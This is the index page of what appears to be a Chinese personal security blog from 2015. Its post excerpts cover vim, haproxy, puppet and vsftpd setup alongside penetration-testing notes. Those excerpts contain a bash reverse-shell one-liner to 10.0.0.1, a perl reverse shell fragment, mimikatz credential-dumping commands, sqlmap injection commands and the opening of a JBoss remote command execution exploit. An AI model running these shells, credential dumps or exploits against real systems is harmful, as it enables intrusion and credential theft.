摘要: 总结一些2015 2015年的计划基本完成了,(sevck.lofter.com),唯一的不足是太自信,很多书也没有读完我买的那些书。2015都做了什么:1.搞安全2.学习了JAVA,自己也写了一些工具,完成了一年写10个项目,比如U盘EXE恢复工具,WEBSCAN的fuzz工具。3.做了很多面试的... 阅读全文
posted @ 2016-01-01 20:53 sevck 阅读(504) 评论(0) 推荐(0) 编辑
摘要: 晚上在看司马的博客,看到一篇关于JAVA安全的,基础的,蛮不错的,给大家分享下文章来源是司马的博客:http://www.nxadmin.com/web/1332.html================================================================... 阅读全文
posted @ 2015-12-27 22:29 sevck 阅读(909) 评论(0) 推荐(0) 编辑
摘要: 1.vim#在命令行中输入vim,进入vim编辑器2.i#按一下i键,下端显示 --INSERT--#插入命令,在vim中可能任意字符都有作用3.Esc#退出i(插入)命令进行其它命令使用4.:r filename#读入一个文件内容,并写入到当前编辑器中5.:w newfilename#将该编辑... 阅读全文
posted @ 2015-12-27 21:12 sevck 阅读(304) 评论(0) 推荐(0) 编辑
摘要: 看吾爱的,刚好问同事说这个也用过,以后内网渗透的话比较方便http://www.52pojie.cn/thread-264895-1-1.html==========================2.0版本的只需要两条命令就可以了,比以前版本的更简单了。第一条:privilege::debug ... 阅读全文
posted @ 2015-12-26 15:42 sevck 阅读(1120) 评论(0) 推荐(0) 编辑
摘要: ./sqlmap.py –h //查看帮助信息./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” //get注入./sqlmap.py –u “http://www.anti-x.net/inject.asp?id... 阅读全文
posted @ 2015-12-25 18:14 sevck 阅读(857) 评论(0) 推荐(0) 编辑
摘要: 在乌云看到了这篇文章,看的我太爽了。从TCL某漏洞看内网渗透教学分享之内网信息探测和后渗透准备披露状态:2015-02-18: 细节已通知厂商并且等待厂商处理中2015-02-27: 厂商已经确认,细节仅向厂商公开2015-03-09: 细节向核心白帽子及相关领域专家公开2015-03-19: 细节... 阅读全文
posted @ 2015-12-11 20:34 sevck 阅读(1769) 评论(0) 推荐(0) 编辑
摘要: exploit-db提供出了EXP,如下: 1 /* 2 * JBoss JMXInvokerServlet Remote Command Execution 3 * JMXInvoker.java v0.3 - Luca Carettoni @_ikki 4 * 5 * This... 阅读全文
posted @ 2015-12-11 17:16 sevck 阅读(1121) 评论(0) 推荐(0) 编辑
摘要: 摘自:http://linzhibin824.blog.163.com/blog/static/735577102013144223127/这款暴力密码破解工具相当强大,支持几乎所有协议的在线密码破解,其密码能否被破解关键在于字典是否足够强大。对于社会工程型渗透来说,有时能够得到事半功倍的效果。本文... 阅读全文
posted @ 2015-12-11 16:38 sevck 阅读(1600) 评论(0) 推荐(0) 编辑
摘要: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheetReverse Shell Cheat SheetIf you’re lucky enough to find a command executionvulner... 阅读全文
posted @ 2015-12-11 10:24 sevck 阅读(1328) 评论(0) 推荐(0) 编辑
摘要: 刚才在和公司做离线IP对比,最后手工了,感觉还是比较麻烦的,遇到数据很大的时候不能手工进行了本想用linux下的DIFF来进行对比,发现结果很乱。时间很紧最后还是手工了。现在忙完要认认真真学习一下这个命令:内容摘自网上:diff是Unix系统的一个很重要的工具程序。它用来比较两个文本文件的差异,是代... 阅读全文
posted @ 2015-12-10 18:42 sevck 阅读(5694) 评论(0) 推荐(1) 编辑
摘要: 1.安装# wgethttp://haproxy.1wt.eu/download/1.3/src/haproxy-1.3.20.tar.gz# tar zcvf haproxy-1.3.20.tar.gz# cd haproxy-1.3.20# make TARGET=linux26 PREFIX=... 阅读全文
posted @ 2015-12-10 11:51 sevck 阅读(358) 评论(0) 推荐(0) 编辑
摘要: 1. 概述puppet是一个开源的软件自动化配置和部署工具,它使用简单且功能强大,正得到了越来越多地关注,现在很多大型IT公司均在使用puppet对集群中的软件进行管理和部署,如google利用puppet管理超过6000台地mac桌面电脑(2007年数据)。本文主要介绍puppet安装方法,设计架... 阅读全文
posted @ 2015-12-05 17:34 sevck 阅读(559) 评论(0) 推荐(0) 编辑
摘要: 博主URL:http://tools.changesec.com/Jenkins-CommonCollections-Exploit/提交漏洞总是要证明漏洞危害,老外写的java代码又有bug,所以随手改掉了点击这里下载代码,或者使用如下命令git clone https://github.com/... 阅读全文
posted @ 2015-12-04 17:23 sevck 阅读(578) 评论(0) 推荐(0) 编辑
摘要: 上周要求写自己用任何语言写一个留言版,存到数据库中,用自己的办法来解决XSS我用了JSP+MYSQL,自己写了一个过滤器来防御WEB XSS漏洞 1 package com.mess.filter; 2 3 public class HtmlFilter { 4 public static... 阅读全文
posted @ 2015-12-04 17:19 sevck 阅读(380) 评论(0) 推荐(0) 编辑
摘要: 在企业级的应用中,越来越多的企业应用开源的vsftpd软件来搭建自己的文件共享服务,优点是速度快且节省开支。然而,企业用户行为难以预料,配置稍有不当则会使该服务成为一个安全风险点,导致带宽恶意占用、用户FTP服务密码泄露等。本文将以实例为大家介绍vsftpd的安全设置方法。 1、vsftpd简介 ... 阅读全文
posted @ 2015-12-03 14:26 sevck 阅读(982) 评论(0) 推荐(0) 编辑
摘要: vsftpd配置参数详细整理 -|白王斧三又干一vsftpd配置参数详细整理 -|白王斧三又干一 发表于 2005-10-23 20:30:001、vsftpd配置参数详细整理#接受匿名用户anonymous_enable=YES#匿名用户login时不询问口令no_anon_password=YE... 阅读全文
posted @ 2015-11-30 14:22 sevck 阅读(3608) 评论(0) 推荐(0) 编辑
摘要: 这几天在公司需要做基线安全,一直都没有经验,所以在网上找了一些,做来参考学习。vsftp配置详解这里是对vsftp配置文件的详细解释,主要参考了《RedHat8.0网络服务》一书中《使用vsftpd架设FTP服务器》一节的内容。声明:以 下内容基于Smartraining工作室Osmond 编著的《... 阅读全文
posted @ 2015-11-30 14:19 sevck 阅读(5210) 评论(0) 推荐(0) 编辑
摘要: 这周六会在公司分享经验和技巧,把自己的和网上的一些技巧来综合写一些,方便大家和自己:普通的XSS,储存,反射,DOM形成的无外乎就是输出点在html标签之间,html属性之间,成为JS代码,称为CSS代码。下面写一些我的技巧:1.引用新增的标签,例如chrome在下一个版本新增了,我们就可以利用... 阅读全文
posted @ 2015-11-27 10:25 sevck 阅读(570) 评论(0) 推荐(0) 编辑
摘要: 看了lijiejie的博客,和乌云的PHPFastCGI的这篇文章,感觉在实际的业务中经常能遇到,所以在此记录下来:原文:http://www.lijiejie.com/fastcgi-read-file-vulnerability-scan-py/http://zone.wooyun.org/co... 阅读全文
posted @ 2015-11-21 10:31 sevck 阅读(549) 评论(0) 推荐(0) 编辑
摘要: bash版本:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1,注意某些linux不支持perl版本:perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname... 阅读全文
posted @ 2015-11-19 20:00 sevck 阅读(1103) 评论(0) 推荐(0) 编辑